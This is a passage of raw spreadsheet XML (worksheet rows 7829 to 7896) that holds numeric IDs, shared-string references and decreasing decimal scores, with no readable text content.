      <c r="E7829" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7829" s="2">
        <v>0.1700854700854701</v>
      </c>
    </row>
    <row r="7830" ht="15.75" customHeight="1">
      <c r="A7830" s="1">
        <v>110.0</v>
      </c>
      <c r="B7830" s="2">
        <v>1.295882E7</v>
      </c>
      <c r="C7830" s="2" t="s">
        <v>7436</v>
      </c>
      <c r="D7830" s="2">
        <v>1.0</v>
      </c>
      <c r="E7830" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7830" s="2">
        <v>0.1695402298850575</v>
      </c>
    </row>
    <row r="7831" ht="15.75" customHeight="1">
      <c r="A7831" s="1">
        <v>14294.0</v>
      </c>
      <c r="B7831" s="2">
        <v>3.8565764E7</v>
      </c>
      <c r="C7831" s="2" t="s">
        <v>7437</v>
      </c>
      <c r="D7831" s="2">
        <v>1.0</v>
      </c>
      <c r="E7831" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7831" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="7832" ht="15.75" customHeight="1">
      <c r="A7832" s="1">
        <v>20617.0</v>
      </c>
      <c r="B7832" s="2">
        <v>1.399517E7</v>
      </c>
      <c r="C7832" s="2" t="s">
        <v>7438</v>
      </c>
      <c r="D7832" s="2">
        <v>1.0</v>
      </c>
      <c r="E7832" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7832" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="7833" ht="15.75" customHeight="1">
      <c r="A7833" s="1">
        <v>26890.0</v>
      </c>
      <c r="B7833" s="2">
        <v>1.9247805E7</v>
      </c>
      <c r="C7833" s="2" t="s">
        <v>7439</v>
      </c>
      <c r="D7833" s="2">
        <v>1.0</v>
      </c>
      <c r="E7833" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7833" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="7834" ht="15.75" customHeight="1">
      <c r="A7834" s="1">
        <v>13925.0</v>
      </c>
      <c r="B7834" s="2">
        <v>3.7099265E7</v>
      </c>
      <c r="C7834" s="2" t="s">
        <v>7440</v>
      </c>
      <c r="D7834" s="2">
        <v>1.0</v>
      </c>
      <c r="E7834" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7834" s="2">
        <v>0.1692708333333334</v>
      </c>
    </row>
    <row r="7835" ht="15.75" customHeight="1">
      <c r="A7835" s="1">
        <v>3631.0</v>
      </c>
      <c r="B7835" s="2">
        <v>3.9232652E7</v>
      </c>
      <c r="C7835" s="2" t="s">
        <v>7441</v>
      </c>
      <c r="D7835" s="2">
        <v>1.0</v>
      </c>
      <c r="E7835" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7835" s="2">
        <v>0.1673441734417344</v>
      </c>
    </row>
    <row r="7836" ht="15.75" customHeight="1">
      <c r="A7836" s="1">
        <v>670.0</v>
      </c>
      <c r="B7836" s="2">
        <v>2.024467E7</v>
      </c>
      <c r="C7836" s="2" t="s">
        <v>7442</v>
      </c>
      <c r="D7836" s="2">
        <v>1.0</v>
      </c>
      <c r="E7836" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7836" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7837" ht="15.75" customHeight="1">
      <c r="A7837" s="1">
        <v>1506.0</v>
      </c>
      <c r="B7837" s="2">
        <v>2.7302109E7</v>
      </c>
      <c r="C7837" s="2" t="s">
        <v>7443</v>
      </c>
      <c r="D7837" s="2">
        <v>1.0</v>
      </c>
      <c r="E7837" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7837" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7838" ht="15.75" customHeight="1">
      <c r="A7838" s="1">
        <v>12155.0</v>
      </c>
      <c r="B7838" s="2">
        <v>2.7303417E7</v>
      </c>
      <c r="C7838" s="2" t="s">
        <v>7443</v>
      </c>
      <c r="D7838" s="2">
        <v>1.0</v>
      </c>
      <c r="E7838" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7838" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7839" ht="15.75" customHeight="1">
      <c r="A7839" s="1">
        <v>19143.0</v>
      </c>
      <c r="B7839" s="2">
        <v>5.4834409E7</v>
      </c>
      <c r="C7839" s="2" t="s">
        <v>7444</v>
      </c>
      <c r="D7839" s="2">
        <v>1.0</v>
      </c>
      <c r="E7839" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7839" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7840" ht="15.75" customHeight="1">
      <c r="A7840" s="1">
        <v>21649.0</v>
      </c>
      <c r="B7840" s="2">
        <v>2.4853818E7</v>
      </c>
      <c r="C7840" s="2" t="s">
        <v>7445</v>
      </c>
      <c r="D7840" s="2">
        <v>1.0</v>
      </c>
      <c r="E7840" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7840" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7841" ht="15.75" customHeight="1">
      <c r="A7841" s="1">
        <v>24926.0</v>
      </c>
      <c r="B7841" s="2">
        <v>1.241522E7</v>
      </c>
      <c r="C7841" s="2" t="s">
        <v>7446</v>
      </c>
      <c r="D7841" s="2">
        <v>1.0</v>
      </c>
      <c r="E7841" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7841" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7842" ht="15.75" customHeight="1">
      <c r="A7842" s="1">
        <v>30204.0</v>
      </c>
      <c r="B7842" s="2">
        <v>3.7306857E7</v>
      </c>
      <c r="C7842" s="2" t="s">
        <v>7447</v>
      </c>
      <c r="D7842" s="2">
        <v>1.0</v>
      </c>
      <c r="E7842" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7842" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="7843" ht="15.75" customHeight="1">
      <c r="A7843" s="1">
        <v>16181.0</v>
      </c>
      <c r="B7843" s="2">
        <v>4.5653148E7</v>
      </c>
      <c r="C7843" s="2" t="s">
        <v>7448</v>
      </c>
      <c r="D7843" s="2">
        <v>1.0</v>
      </c>
      <c r="E7843" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7843" s="2">
        <v>0.1657407407407408</v>
      </c>
    </row>
    <row r="7844" ht="15.75" customHeight="1">
      <c r="A7844" s="1">
        <v>4641.0</v>
      </c>
      <c r="B7844" s="2">
        <v>4.3026893E7</v>
      </c>
      <c r="C7844" s="2" t="s">
        <v>7449</v>
      </c>
      <c r="D7844" s="2">
        <v>1.0</v>
      </c>
      <c r="E7844" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7844" s="2">
        <v>0.1652601969057666</v>
      </c>
    </row>
    <row r="7845" ht="15.75" customHeight="1">
      <c r="A7845" s="1">
        <v>32189.0</v>
      </c>
      <c r="B7845" s="2">
        <v>5472520.0</v>
      </c>
      <c r="C7845" s="2" t="s">
        <v>7450</v>
      </c>
      <c r="D7845" s="2">
        <v>1.0</v>
      </c>
      <c r="E7845" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7845" s="2">
        <v>0.164957264957265</v>
      </c>
    </row>
    <row r="7846" ht="15.75" customHeight="1">
      <c r="A7846" s="1">
        <v>11913.0</v>
      </c>
      <c r="B7846" s="2">
        <v>2.5248495E7</v>
      </c>
      <c r="C7846" s="2" t="s">
        <v>7451</v>
      </c>
      <c r="D7846" s="2">
        <v>1.0</v>
      </c>
      <c r="E7846" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7846" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="7847" ht="15.75" customHeight="1">
      <c r="A7847" s="1">
        <v>22202.0</v>
      </c>
      <c r="B7847" s="2">
        <v>3.200694E7</v>
      </c>
      <c r="C7847" s="2" t="s">
        <v>7452</v>
      </c>
      <c r="D7847" s="2">
        <v>1.0</v>
      </c>
      <c r="E7847" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7847" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="7848" ht="15.75" customHeight="1">
      <c r="A7848" s="1">
        <v>23710.0</v>
      </c>
      <c r="B7848" s="2">
        <v>7177714.0</v>
      </c>
      <c r="C7848" s="2" t="s">
        <v>7453</v>
      </c>
      <c r="D7848" s="2">
        <v>1.0</v>
      </c>
      <c r="E7848" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7848" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="7849" ht="15.75" customHeight="1">
      <c r="A7849" s="1">
        <v>28153.0</v>
      </c>
      <c r="B7849" s="2">
        <v>2.4853817E7</v>
      </c>
      <c r="C7849" s="2" t="s">
        <v>7445</v>
      </c>
      <c r="D7849" s="2">
        <v>1.0</v>
      </c>
      <c r="E7849" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7849" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="7850" ht="15.75" customHeight="1">
      <c r="A7850" s="1">
        <v>14722.0</v>
      </c>
      <c r="B7850" s="2">
        <v>4.0654444E7</v>
      </c>
      <c r="C7850" s="2" t="s">
        <v>7454</v>
      </c>
      <c r="D7850" s="2">
        <v>1.0</v>
      </c>
      <c r="E7850" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7850" s="2">
        <v>0.164783427495292</v>
      </c>
    </row>
    <row r="7851" ht="15.75" customHeight="1">
      <c r="A7851" s="1">
        <v>9224.0</v>
      </c>
      <c r="B7851" s="2">
        <v>5.5436655E7</v>
      </c>
      <c r="C7851" s="2" t="s">
        <v>7455</v>
      </c>
      <c r="D7851" s="2">
        <v>1.0</v>
      </c>
      <c r="E7851" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7851" s="2">
        <v>0.1647834274952919</v>
      </c>
    </row>
    <row r="7852" ht="15.75" customHeight="1">
      <c r="A7852" s="1">
        <v>3998.0</v>
      </c>
      <c r="B7852" s="2">
        <v>4.0883082E7</v>
      </c>
      <c r="C7852" s="2" t="s">
        <v>7456</v>
      </c>
      <c r="D7852" s="2">
        <v>1.0</v>
      </c>
      <c r="E7852" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7852" s="2">
        <v>0.1647286821705427</v>
      </c>
    </row>
    <row r="7853" ht="15.75" customHeight="1">
      <c r="A7853" s="1">
        <v>33540.0</v>
      </c>
      <c r="B7853" s="2">
        <v>8148794.0</v>
      </c>
      <c r="C7853" s="2" t="s">
        <v>7457</v>
      </c>
      <c r="D7853" s="2">
        <v>1.0</v>
      </c>
      <c r="E7853" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7853" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="7854" ht="15.75" customHeight="1">
      <c r="A7854" s="1">
        <v>25467.0</v>
      </c>
      <c r="B7854" s="2">
        <v>1.3995169E7</v>
      </c>
      <c r="C7854" s="2" t="s">
        <v>7438</v>
      </c>
      <c r="D7854" s="2">
        <v>1.0</v>
      </c>
      <c r="E7854" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7854" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="7855" ht="15.75" customHeight="1">
      <c r="A7855" s="1">
        <v>15474.0</v>
      </c>
      <c r="B7855" s="2">
        <v>4.3148361E7</v>
      </c>
      <c r="C7855" s="2" t="s">
        <v>7458</v>
      </c>
      <c r="D7855" s="2">
        <v>1.0</v>
      </c>
      <c r="E7855" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7855" s="2">
        <v>0.1637931034482759</v>
      </c>
    </row>
    <row r="7856" ht="15.75" customHeight="1">
      <c r="A7856" s="1">
        <v>842.0</v>
      </c>
      <c r="B7856" s="2">
        <v>2.1648765E7</v>
      </c>
      <c r="C7856" s="2" t="s">
        <v>7459</v>
      </c>
      <c r="D7856" s="2">
        <v>1.0</v>
      </c>
      <c r="E7856" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7856" s="2">
        <v>0.1637037037037037</v>
      </c>
    </row>
    <row r="7857" ht="15.75" customHeight="1">
      <c r="A7857" s="1">
        <v>5216.0</v>
      </c>
      <c r="B7857" s="2">
        <v>4.4957238E7</v>
      </c>
      <c r="C7857" s="2" t="s">
        <v>7460</v>
      </c>
      <c r="D7857" s="2">
        <v>1.0</v>
      </c>
      <c r="E7857" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7857" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="7858" ht="15.75" customHeight="1">
      <c r="A7858" s="1">
        <v>11492.0</v>
      </c>
      <c r="B7858" s="2">
        <v>2.2056184E7</v>
      </c>
      <c r="C7858" s="2" t="s">
        <v>7461</v>
      </c>
      <c r="D7858" s="2">
        <v>1.0</v>
      </c>
      <c r="E7858" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7858" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="7859" ht="15.75" customHeight="1">
      <c r="A7859" s="1">
        <v>21500.0</v>
      </c>
      <c r="B7859" s="2">
        <v>2.3112927E7</v>
      </c>
      <c r="C7859" s="2" t="s">
        <v>7462</v>
      </c>
      <c r="D7859" s="2">
        <v>1.0</v>
      </c>
      <c r="E7859" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7859" s="2">
        <v>0.1636904761904763</v>
      </c>
    </row>
    <row r="7860" ht="15.75" customHeight="1">
      <c r="A7860" s="1">
        <v>5898.0</v>
      </c>
      <c r="B7860" s="2">
        <v>4.7133455E7</v>
      </c>
      <c r="C7860" s="2" t="s">
        <v>7463</v>
      </c>
      <c r="D7860" s="2">
        <v>1.0</v>
      </c>
      <c r="E7860" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7860" s="2">
        <v>0.1635367762128326</v>
      </c>
    </row>
    <row r="7861" ht="15.75" customHeight="1">
      <c r="A7861" s="1">
        <v>30931.0</v>
      </c>
      <c r="B7861" s="2">
        <v>4.710971E7</v>
      </c>
      <c r="C7861" s="2" t="s">
        <v>7464</v>
      </c>
      <c r="D7861" s="2">
        <v>1.0</v>
      </c>
      <c r="E7861" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7861" s="2">
        <v>0.1630824372759856</v>
      </c>
    </row>
    <row r="7862" ht="15.75" customHeight="1">
      <c r="A7862" s="1">
        <v>2177.0</v>
      </c>
      <c r="B7862" s="2">
        <v>3.1798709E7</v>
      </c>
      <c r="C7862" s="2" t="s">
        <v>7465</v>
      </c>
      <c r="D7862" s="2">
        <v>1.0</v>
      </c>
      <c r="E7862" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7862" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="7863" ht="15.75" customHeight="1">
      <c r="A7863" s="1">
        <v>27551.0</v>
      </c>
      <c r="B7863" s="2">
        <v>2.2347655E7</v>
      </c>
      <c r="C7863" s="2" t="s">
        <v>7466</v>
      </c>
      <c r="D7863" s="2">
        <v>1.0</v>
      </c>
      <c r="E7863" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7863" s="2">
        <v>0.1630236794171221</v>
      </c>
    </row>
    <row r="7864" ht="15.75" customHeight="1">
      <c r="A7864" s="1">
        <v>12648.0</v>
      </c>
      <c r="B7864" s="2">
        <v>3.0387117E7</v>
      </c>
      <c r="C7864" s="2" t="s">
        <v>7467</v>
      </c>
      <c r="D7864" s="2">
        <v>1.0</v>
      </c>
      <c r="E7864" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7864" s="2">
        <v>0.162037037037037</v>
      </c>
    </row>
    <row r="7865" ht="15.75" customHeight="1">
      <c r="A7865" s="1">
        <v>4404.0</v>
      </c>
      <c r="B7865" s="2">
        <v>4.2279152E7</v>
      </c>
      <c r="C7865" s="2" t="s">
        <v>7468</v>
      </c>
      <c r="D7865" s="2">
        <v>1.0</v>
      </c>
      <c r="E7865" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7865" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="7866" ht="15.75" customHeight="1">
      <c r="A7866" s="1">
        <v>4644.0</v>
      </c>
      <c r="B7866" s="2">
        <v>4.3033E7</v>
      </c>
      <c r="C7866" s="2" t="s">
        <v>7469</v>
      </c>
      <c r="D7866" s="2">
        <v>1.0</v>
      </c>
      <c r="E7866" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7866" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="7867" ht="15.75" customHeight="1">
      <c r="A7867" s="1">
        <v>4950.0</v>
      </c>
      <c r="B7867" s="2">
        <v>4.4053078E7</v>
      </c>
      <c r="C7867" s="2" t="s">
        <v>7470</v>
      </c>
      <c r="D7867" s="2">
        <v>1.0</v>
      </c>
      <c r="E7867" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7867" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="7868" ht="15.75" customHeight="1">
      <c r="A7868" s="1">
        <v>6283.0</v>
      </c>
      <c r="B7868" s="2">
        <v>4.8156084E7</v>
      </c>
      <c r="C7868" s="2" t="s">
        <v>7471</v>
      </c>
      <c r="D7868" s="2">
        <v>1.0</v>
      </c>
      <c r="E7868" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7868" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="7869" ht="15.75" customHeight="1">
      <c r="A7869" s="1">
        <v>9899.0</v>
      </c>
      <c r="B7869" s="2">
        <v>5.6771662E7</v>
      </c>
      <c r="C7869" s="2" t="s">
        <v>7472</v>
      </c>
      <c r="D7869" s="2">
        <v>1.0</v>
      </c>
      <c r="E7869" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7869" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="7870" ht="15.75" customHeight="1">
      <c r="A7870" s="1">
        <v>22241.0</v>
      </c>
      <c r="B7870" s="2">
        <v>3.2708483E7</v>
      </c>
      <c r="C7870" s="2" t="s">
        <v>7473</v>
      </c>
      <c r="D7870" s="2">
        <v>1.0</v>
      </c>
      <c r="E7870" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7870" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="7871" ht="15.75" customHeight="1">
      <c r="A7871" s="1">
        <v>4495.0</v>
      </c>
      <c r="B7871" s="2">
        <v>4.2534694E7</v>
      </c>
      <c r="C7871" s="2" t="s">
        <v>7474</v>
      </c>
      <c r="D7871" s="2">
        <v>1.0</v>
      </c>
      <c r="E7871" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7871" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="7872" ht="15.75" customHeight="1">
      <c r="A7872" s="1">
        <v>4690.0</v>
      </c>
      <c r="B7872" s="2">
        <v>4.3230213E7</v>
      </c>
      <c r="C7872" s="2" t="s">
        <v>7475</v>
      </c>
      <c r="D7872" s="2">
        <v>1.0</v>
      </c>
      <c r="E7872" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7872" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="7873" ht="15.75" customHeight="1">
      <c r="A7873" s="1">
        <v>4691.0</v>
      </c>
      <c r="B7873" s="2">
        <v>4.3230213E7</v>
      </c>
      <c r="C7873" s="2" t="s">
        <v>7476</v>
      </c>
      <c r="D7873" s="2">
        <v>1.0</v>
      </c>
      <c r="E7873" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7873" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="7874" ht="15.75" customHeight="1">
      <c r="A7874" s="1">
        <v>33879.0</v>
      </c>
      <c r="B7874" s="2">
        <v>9116544.0</v>
      </c>
      <c r="C7874" s="2" t="s">
        <v>7477</v>
      </c>
      <c r="D7874" s="2">
        <v>1.0</v>
      </c>
      <c r="E7874" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7874" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="7875" ht="15.75" customHeight="1">
      <c r="A7875" s="1">
        <v>11313.0</v>
      </c>
      <c r="B7875" s="2">
        <v>2.1037778E7</v>
      </c>
      <c r="C7875" s="2" t="s">
        <v>7478</v>
      </c>
      <c r="D7875" s="2">
        <v>1.0</v>
      </c>
      <c r="E7875" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7875" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="7876" ht="15.75" customHeight="1">
      <c r="A7876" s="1">
        <v>3265.0</v>
      </c>
      <c r="B7876" s="2">
        <v>3.7460207E7</v>
      </c>
      <c r="C7876" s="2" t="s">
        <v>7479</v>
      </c>
      <c r="D7876" s="2">
        <v>1.0</v>
      </c>
      <c r="E7876" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7876" s="2">
        <v>0.1598290598290598</v>
      </c>
    </row>
    <row r="7877" ht="15.75" customHeight="1">
      <c r="A7877" s="1">
        <v>8569.0</v>
      </c>
      <c r="B7877" s="2">
        <v>5.4185168E7</v>
      </c>
      <c r="C7877" s="2" t="s">
        <v>7480</v>
      </c>
      <c r="D7877" s="2">
        <v>1.0</v>
      </c>
      <c r="E7877" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7877" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="7878" ht="15.75" customHeight="1">
      <c r="A7878" s="1">
        <v>5341.0</v>
      </c>
      <c r="B7878" s="2">
        <v>4.5330182E7</v>
      </c>
      <c r="C7878" s="2" t="s">
        <v>7481</v>
      </c>
      <c r="D7878" s="2">
        <v>1.0</v>
      </c>
      <c r="E7878" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7878" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="7879" ht="15.75" customHeight="1">
      <c r="A7879" s="1">
        <v>13470.0</v>
      </c>
      <c r="B7879" s="2">
        <v>3.5246048E7</v>
      </c>
      <c r="C7879" s="2" t="s">
        <v>7482</v>
      </c>
      <c r="D7879" s="2">
        <v>1.0</v>
      </c>
      <c r="E7879" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7879" s="2">
        <v>0.1586257309941521</v>
      </c>
    </row>
    <row r="7880" ht="15.75" customHeight="1">
      <c r="A7880" s="1">
        <v>5119.0</v>
      </c>
      <c r="B7880" s="2">
        <v>4.4557237E7</v>
      </c>
      <c r="C7880" s="2" t="s">
        <v>7483</v>
      </c>
      <c r="D7880" s="2">
        <v>1.0</v>
      </c>
      <c r="E7880" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7880" s="2">
        <v>0.1580459770114944</v>
      </c>
    </row>
    <row r="7881" ht="15.75" customHeight="1">
      <c r="A7881" s="1">
        <v>1862.0</v>
      </c>
      <c r="B7881" s="2">
        <v>2.9513646E7</v>
      </c>
      <c r="C7881" s="2" t="s">
        <v>7484</v>
      </c>
      <c r="D7881" s="2">
        <v>1.0</v>
      </c>
      <c r="E7881" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7881" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="7882" ht="15.75" customHeight="1">
      <c r="A7882" s="1">
        <v>8061.0</v>
      </c>
      <c r="B7882" s="2">
        <v>5.2925111E7</v>
      </c>
      <c r="C7882" s="2" t="s">
        <v>7485</v>
      </c>
      <c r="D7882" s="2">
        <v>1.0</v>
      </c>
      <c r="E7882" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7882" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="7883" ht="15.75" customHeight="1">
      <c r="A7883" s="1">
        <v>9284.0</v>
      </c>
      <c r="B7883" s="2">
        <v>5.5524853E7</v>
      </c>
      <c r="C7883" s="2" t="s">
        <v>7486</v>
      </c>
      <c r="D7883" s="2">
        <v>1.0</v>
      </c>
      <c r="E7883" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7883" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="7884" ht="15.75" customHeight="1">
      <c r="A7884" s="1">
        <v>14251.0</v>
      </c>
      <c r="B7884" s="2">
        <v>3.836868E7</v>
      </c>
      <c r="C7884" s="2" t="s">
        <v>7487</v>
      </c>
      <c r="D7884" s="2">
        <v>1.0</v>
      </c>
      <c r="E7884" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7884" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="7885" ht="15.75" customHeight="1">
      <c r="A7885" s="1">
        <v>1566.0</v>
      </c>
      <c r="B7885" s="2">
        <v>2.7655024E7</v>
      </c>
      <c r="C7885" s="2" t="s">
        <v>7488</v>
      </c>
      <c r="D7885" s="2">
        <v>1.0</v>
      </c>
      <c r="E7885" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7885" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="7886" ht="15.75" customHeight="1">
      <c r="A7886" s="1">
        <v>11409.0</v>
      </c>
      <c r="B7886" s="2">
        <v>2.1649645E7</v>
      </c>
      <c r="C7886" s="2" t="s">
        <v>7489</v>
      </c>
      <c r="D7886" s="2">
        <v>1.0</v>
      </c>
      <c r="E7886" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7886" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="7887" ht="15.75" customHeight="1">
      <c r="A7887" s="1">
        <v>27770.0</v>
      </c>
      <c r="B7887" s="2">
        <v>2.3112926E7</v>
      </c>
      <c r="C7887" s="2" t="s">
        <v>7490</v>
      </c>
      <c r="D7887" s="2">
        <v>1.0</v>
      </c>
      <c r="E7887" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7887" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="7888" ht="15.75" customHeight="1">
      <c r="A7888" s="1">
        <v>4853.0</v>
      </c>
      <c r="B7888" s="2">
        <v>4.3749452E7</v>
      </c>
      <c r="C7888" s="2" t="s">
        <v>7491</v>
      </c>
      <c r="D7888" s="2">
        <v>1.0</v>
      </c>
      <c r="E7888" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7888" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="7889" ht="15.75" customHeight="1">
      <c r="A7889" s="1">
        <v>32282.0</v>
      </c>
      <c r="B7889" s="2">
        <v>5534375.0</v>
      </c>
      <c r="C7889" s="2" t="s">
        <v>7492</v>
      </c>
      <c r="D7889" s="2">
        <v>1.0</v>
      </c>
      <c r="E7889" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7889" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="7890" ht="15.75" customHeight="1">
      <c r="A7890" s="1">
        <v>9283.0</v>
      </c>
      <c r="B7890" s="2">
        <v>5.5524853E7</v>
      </c>
      <c r="C7890" s="2" t="s">
        <v>7493</v>
      </c>
      <c r="D7890" s="2">
        <v>1.0</v>
      </c>
      <c r="E7890" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7890" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="7891" ht="15.75" customHeight="1">
      <c r="A7891" s="1">
        <v>5318.0</v>
      </c>
      <c r="B7891" s="2">
        <v>4.5284136E7</v>
      </c>
      <c r="C7891" s="2" t="s">
        <v>7494</v>
      </c>
      <c r="D7891" s="2">
        <v>1.0</v>
      </c>
      <c r="E7891" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7891" s="2">
        <v>0.1560846560846562</v>
      </c>
    </row>
    <row r="7892" ht="15.75" customHeight="1">
      <c r="A7892" s="1">
        <v>2528.0</v>
      </c>
      <c r="B7892" s="2">
        <v>3.4076296E7</v>
      </c>
      <c r="C7892" s="2" t="s">
        <v>7495</v>
      </c>
      <c r="D7892" s="2">
        <v>1.0</v>
      </c>
      <c r="E7892" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7892" s="2">
        <v>0.156045751633987</v>
      </c>
    </row>
    <row r="7893" ht="15.75" customHeight="1">
      <c r="A7893" s="1">
        <v>2971.0</v>
      </c>
      <c r="B7893" s="2">
        <v>3.6084057E7</v>
      </c>
      <c r="C7893" s="2" t="s">
        <v>7496</v>
      </c>
      <c r="D7893" s="2">
        <v>1.0</v>
      </c>
      <c r="E7893" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7893" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="7894" ht="15.75" customHeight="1">
      <c r="A7894" s="1">
        <v>10624.0</v>
      </c>
      <c r="B7894" s="2">
        <v>1.3813603E7</v>
      </c>
      <c r="C7894" s="2" t="s">
        <v>7497</v>
      </c>
      <c r="D7894" s="2">
        <v>1.0</v>
      </c>
      <c r="E7894" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7894" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="7895" ht="15.75" customHeight="1">
      <c r="A7895" s="1">
        <v>1682.0</v>
      </c>
      <c r="B7895" s="2">
        <v>2.8394288E7</v>
      </c>
      <c r="C7895" s="2" t="s">
        <v>7498</v>
      </c>
      <c r="D7895" s="2">
        <v>1.0</v>
      </c>
      <c r="E7895" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F7895" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="7896" ht="15.75" customHeight="1">
      <c r="A7896" s="1">
        <v>7894.0</v>
      </c>
      <c r="B7896" s="2">
        <v>5.2443149E7</v>
      </c>
      <c r="C7896" s="2" t="s">
        <v>7499</v>
      </c>
      <c r="D7896" s="2">
        <v>1.0</v>
      </c>
      <c r="E7896" s="3" t="s">
